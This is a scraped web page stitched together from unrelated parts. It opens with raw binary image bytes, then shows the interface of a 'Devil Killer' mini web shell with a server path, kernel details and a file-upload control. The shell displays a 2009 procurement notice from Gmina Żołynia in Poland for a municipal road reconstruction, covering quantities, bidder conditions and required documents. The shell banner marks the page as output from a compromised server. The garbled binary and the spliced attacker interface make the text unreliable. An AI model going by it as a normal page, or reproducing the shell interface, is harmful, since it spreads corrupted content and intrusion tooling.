JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090204/16812-N-2009.html

<p class="kh_header"><b>Żołynia: Przebudowa drogi gminnej Nr 1 10005 R Biedaczów - Kopanie</b><br>
<b>Numer ogłoszenia: 16812 - 2009; data zamieszczenia: 04.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żołynia , ul. Rynek 22, 37-110 Żołynia, woj. podkarpackie, tel. 017 2243018, faks 017 2243476.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zolynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi gminnej Nr 1 10005 R Biedaczów - Kopanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ROBOTY  PRZYGOTOWAWCZE		
Otworzenie (wyznaczenie)  trasy i punktów   wysokościowych		
Roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie pagórkowatym.                                                                                                                                              km 0+000 do  km 4+750 = 4,75 km	  km	4,75
Mechaniczne rozebranie podbudowy z kruszywa łamanego o grubości 24 cm pod ściek przykrawężnikowy.                                                                                                      F = 250,00x0,21+102,50x0,21 = 74,03 m2           	m2	74
Rozbiórki elementów dróg		
Mechaniczne rozebranie nawierzchni z mas bitumicznych gr 6 cm    4x5x1,5= 30 m2	m2	30
Mechaniczne rozebranie podbudowy z gruntu stabilizowenego cementem gr w-wy 15 cm obmiar jak wyżej	m2	30
Mechaniczne rozebranie przepustów betonowych o średnicy 50 cm    3x 8= 24 m	m	24
Odwiezienie materiału z rozbiórki  samochodami  skrzyniowymi na odległość 1 km  przy ręcznym załadunku  i wyładunku.                                                                                              30x 0,2+3x8x3,14x0,36x0,36=15,8 m3                 	m3	16
ROBOTY  ZIEMNE 		
Wykonanie wykopów w gruntach I-V kat.		
Roboty  ziemne  poprzeczne wykonywane  mechanicznie  z  wbudowaniem  ziemi  w  nasyp,grunt  kat. III. (uzupełnienie poboczy) 70% 4750x2x0,75x0,012x0,7 = 599 m3                                                                                                 	m3	599
Roboty ziemne ręczne na przerzut poprzeczny z transportem taczkami gr.IIIkat. Zużycie na miejscu - wykopy pod murki czołowe przepustów  i ścianki czołowe przepustów pod zjazdami 855-599 = 256 m3	m3	256
Roboty ziemne wykonywane mechanicznie pogłębianie rowów i wykop pod przepusty w gruncie kat. III z transportem urobku samochodami samowyładowczymi na odległość do 1 km na  odkład i zjazdy  (km  0+0010 - 0+200 190x0,3 = 57m3 +km 0+200 -1+030  830x0,5= 415m3 + km 1+030  - 3+500  2470x0,4 = 988m3 + km  3+500 - 3+600  100x0,2 = 20 m3 + km 3+600 - 4+750  1150x0,35 = 402,5 m3) + 4x9x1,5x1+2x1,84x0,8x0,4+16x2,12x0,8x0,4+4x2,56x0,8x0,4 - 599 = 1882,5+54+1,8+10,85+3,28 - 599 = 1353 m3 	m3	1353
Ręczne plantowanie (obrobienie na czysto) skarp  wykopów  w gruncie kat. III.                                                                                                    Ilość  wg  zał. Nr 3                                                                                                                                                                                                  F =  685,40m2	m2	685
Wykonanie nasypów  		
Ręczne formowanie nasypów z ziemi uzyskanej z wykopu - grunt kat.III. - formowanie poboczy 70% ogólnych nasypów i nasypów na zjazdach  (855+146x3)x0,7 = 905 m3                                                                                                                                                                                                                                                            	 m3	905
Zagęszczenie nasypów mechanicznie - grunt sypki kat.III.                                                                                                                                                                                                                                                  855 + 438 = 1293 m3 	m3	1293
Mechaniczne formowanie nasypów z ziemi dowożonej samochodami samowyładowczymi - grunt kat.IV.                                                                                                                                              jak wyżej                                                                                                                                                                                                   V =  326,50 m	 m3	381
Mechaniczne zagęszczanie uprzednio rozplantowanego warstwami gruntu w nasypie w - grunt  kat. III.                                                                                                 Ilość wg zał. Nr 1 (objętość  nasypu)                                                                                                                                                                         V = 839,00 - 103,00 = 736,00 m 3	m3	736
ODWODNIENIE  KORPUSU  DROGOWEGO		
Przepusty pod koroną drogi		
Wykonanie części przelotowej przepustu fi 50 z rur żelbetowych VIPRO km 4+690	mb	9
Wykonanie części przelotowej przepustu z rur żelbetowych fi 60 cm VIPRO   w km 0+990, km 4+090, km 4+490  8+9+9 = 26 mb	mb	26
wykonanie żelbetowej obudowy wylotów i wlotów przepustów pod drogą ( 4 szt fi 80, 16 szt fi 60 i 2 szt fi 50)    4x(2,56x0,8x0,4+2,56x1,08x0,3- 3,14x0,44x0,44x0,3) + 16x(2,12x0,8x0,4+2,12x0,86x0,3 - 3,14x0,33x0,33x0,3)+ 2x(1,84x0,8x0,4+1,84x0,75x0,3 - 3,14x0,27x027x0,3) = 4x(0,82+0,83 - 0,18) + 16x(0,68+0,55 - 0,10  m3) + 2x(0,59+0,42 - 0,07) = 5,88+18,08+1,88 =25,84 m3	m3	25,84
PODBUDOWA		
		
Mechaniczne profilowanie i zagęszczanie podłoża gruntowego kat. III                                                                                                                                                                 Ilość  wg  zał. Nr 8                                                                                                                                                                                      F= 597,0 m2	m2	597
Oczyszczenie i skropienie warstw konstrukcyjnych  		
Skropienie  podbudowy asfaltem.      km 0+000 do 4+750  (dwukrotnie - istniejącą nawierzchnię i warstwę wiążącą)                                                                                                                                                                                                                                                                                                                                                                  km 0+000 do 1+030  2x5,1x1030 =10506 m2  km 1+030 do 1+1050  20x(5,1+4,6)x0,5x2  = 194 m2 1+050 do 3+480  2430x4,6x2 = 22356,0 m2  km 2+480 do 3+500  20x(4,6+5,1)x0,5x2 = 194 m2  km 3+500 do 4+750  1250x5,1x2 = 12750 m2 2x 6x6+2x6x6 = 144 m2   F =  10506 + 194 + 22356 + 194 + 12750 + 144 = 46144,0 m2                                                   	m2	46144
Podbudowa z kruszywa łamanego stabilizowanego mechanicznie		
Wykonanie warstwy odcinającej śred. grubości  10 cm z piasku na poszerzeniu i przekopach jezdni pod przepusty 40x0,6+4x5x1,5= 54 m2	m2	54
Wykonanie dolnej  warstwy podbudowy z kruszywa łamanego stabilizowanego mechanicznie o grubości 15 cm poszerzenie i przekopy pod przepusty obmiar jak wyżej 54 m2	m2	54
Wykonanie górnej  warstwy podbudowy z kruszywa łamanego stabilizowanego mechanicznie o grubości 10 cm obmiar jak wyżej        54 m2                                                                                                                                                                                                                                                                                                                                               	m2	54
Wyrównanie isniejącej nawierzchni kruszywem 0/31,5 (likwidacja wyboji) 190x0,055=10,45 m3	m3	10
Wyrównanie istniejącej nawierzchni mieszanką mineralno-bitumiczną na całym odcinku likwidacja ubytków w naierzchni    42 tony	ton	42
NAWIERZCHNIA		
Nawierzchnia z betonu asfaltowego  		
Wykonanie warstwy wiążącej grubości 6 cm z betonu asfaltowego III standard z transportem mieszanki z wytwórni do miejsca wbudowania km 0+000 do 1+030   1030x5,1+ km 1+030 do 1+050  20x(5,1+4,6)x0,5 + km1+050 do 3+480 2430x4,6+ km 3+480 do 3+500 20x(4,6+5,1)x0,5 +km 3+500+4+750 1250 x5,1+ włączenia do dróg  2x6x6 = 5253+97+11178+97+6375+72 = 23072 m2   + wzmocnienie w km 1+520 do 1+670 i 1980 do 2+020  (150+40)x4,6 = 874 m2    F = 23072+874 = 23946 m2	m2	23946
Wykonanie  warstwy ścieralnej nawierzchni z  betonu asfaltowego standard III  grubości 5 cm wraz z  transportem masy z wytwórni do miejsca wbudowania.      km 0+000 do 4+750  1030x5 +20x(5,0+4,50)x05 +2430x4,5+20x(4,5+5,0)x0,5+1250x5+2x6x6 = 5150+95+ 10935+95+6250+72 = 22597m2                                                                                                                                                                                                                                                                                                                                                                                	m2	22597
  ROBOTY  WYKOŃCZENIOWE		 
Umocnienie skarp i rowów		
Ułożenie ścieków betonowych 50x50x15 na podsypce cementowo - piaskowej  lewa strona km 0+005 do 0+990 i 3+500 do 3+600 1085 mb   prawa strona 0+005 do0+710 i 3+500 do 3+600  805 mb Razem 1890 mb 	mb	1890
Umocnienie skarpy płytami ażurowymi JOMB gr. 6 cm                                           15x1,2 = 18 m2	m2	18
Przepusty pod zjazdami	 	 
Wykonanie ławy fundamentowej z pospółki pod przepusty rurowe.                                                                                                                                                                                                                                                                                                                                              556x0,4x0,1 = 22,2 m3	m3	22,2
Ułożenie przepustów z rur betonowych o średnicy 40 cm.                                                                                                                                              556 mb  wg wykazu	mb	556
Scianki czołowe przepustów pod zjazdami o średnicy 40 cm. z betonu B-20                                                                                                                                             111x2 = 222szt	szt	222
Ułożenie przepustów z rur betonowych o średnicy 50 cm wg wykazu 7mb	mb	7
Ścianki czołowe przepustów pod zjazdami o średnicy 50 cm                    1x2 = 2 szt	szt	2
  OZNAKOWANIE DRÓG		 
Ustawienie słupków stalowych o średnicy 7 cm do znaków drogowych 6szt 	szt	6
Przymocowanie  tarcz  znaków  drogowych do  słupków  stalowych                                                                                                                                                                                                                                                                                                                                 	szt	6
Wykonanie podbudowy z pospółki stabilizowanej cementem o grubości warstwy po zagęszczeniu 15 cm, RM - 2,5 Mpa.                                                                                                                                                         F = (56,0+20,0)x0,5x3,0 = 114,00 m2                                                                                                                                                          	 m2	114
INNE  ROBOTY		 
Zjazdy na drogi boczne i do gospodarstw - nawierzchnia	 	 
Wykonanie warstwy odcinającej śred. grubości  10 cm z piasku na zjazdach        wg wykazu 745 m2	m2	745
Wykonanie górnej  warstwy podbudowy z kruszywa łamanego stabilizowanego mechanicznie o grubości 10 cm obmiar jak wyżej        747m2                                                                                                                                                                                                                                                                                                                                               	m2	745
Oczyszczenie przepustów z namułu fi 60 zamulonych 50%    5x9 = 45 mb	mb	45
Oczyszczenie przepustów jak wyżej lecz fi 80 cm  2x9 = 18 mb	mb	18.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium

Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 20000,00 zł ,słownie: dwadzieścia tysięcy .<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:

1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:

2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
  2.6 nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą. 
  2.7 Inne podstawy wykluczenia wykonawców

3. Zamawiający odrzuca ofertę jeżeli:

3.1 jest niezgodną z ustawą
3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
3.6 zawiera błędy w obliczeniu ceny 
3.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
3.8 jest nieważna na podstawie odrębnych przepisów, 

4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą

5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia,niespełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:

  A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę 
  A.2) Formularz cenowy - wypełniony i podpisany przez wykonawcę 
  A.3)   Wzór umowy   A.4) oswiadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne  ,oferowane warunki gwarancji ,  

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
 
  B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
  B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
  B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
  B.4) Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
  B.5) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
  B.6) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych.   

  C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 

 
  C.1) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie.   

  C.2) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca.oraz  pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie tym wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.

  C.3) Informacja na temat przeciętnej liczby zatrudnionych pracowników lub liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie, jeżeli przedmiotem zamówienia są roboty budowlane lub usługi.   
  C.4) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
oraz
pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował.  
  C.5) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 


  D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: 

  D.2) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
  D.3) -Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  


E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:

  E.1) Zamiast dokumentów, o których mowa w pkt. B.1), B.3), B.5) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

  E.2) Zamiast dokumentu, o którym mowa w pkt. B.4) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.   


F. Dokumenty wymagane w przypadku składania oferty wspólnej: 

F.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy

  Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B1-B6 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie   


  G. W celu potwierdzenia, że oferowane  roboty budowlane odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty: 

  G.1) próbek, opisów lub fotografii 
  G.2) zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym , lub równoważne zaświadczenie wystawione przez podmiot mający siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego .
  G.3) zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich , lub równoważne zaświadczenie wystawione przez podmiot mający siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego albo inny dokument potwierdzający odpowiednio stosowanie przez wykonawcę równoważnych środków zapewnienia jakości.
  G.4) zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji  lub równoważne zaświadczenie wystawione przez podmiot mający siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego albo inny dokument potwierdzający odpowiednio stosowanie przez wykonawcę równoważnych środków zarządzania środowiskiem. 


H. Postanowienia dotyczące składanych dokumentów

H.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę , osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.

H.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Warunki gwarancji - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zolynia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> urząd Gminy w Żołyni
37-110 Żołynia
ul. Rynek 22.</p>
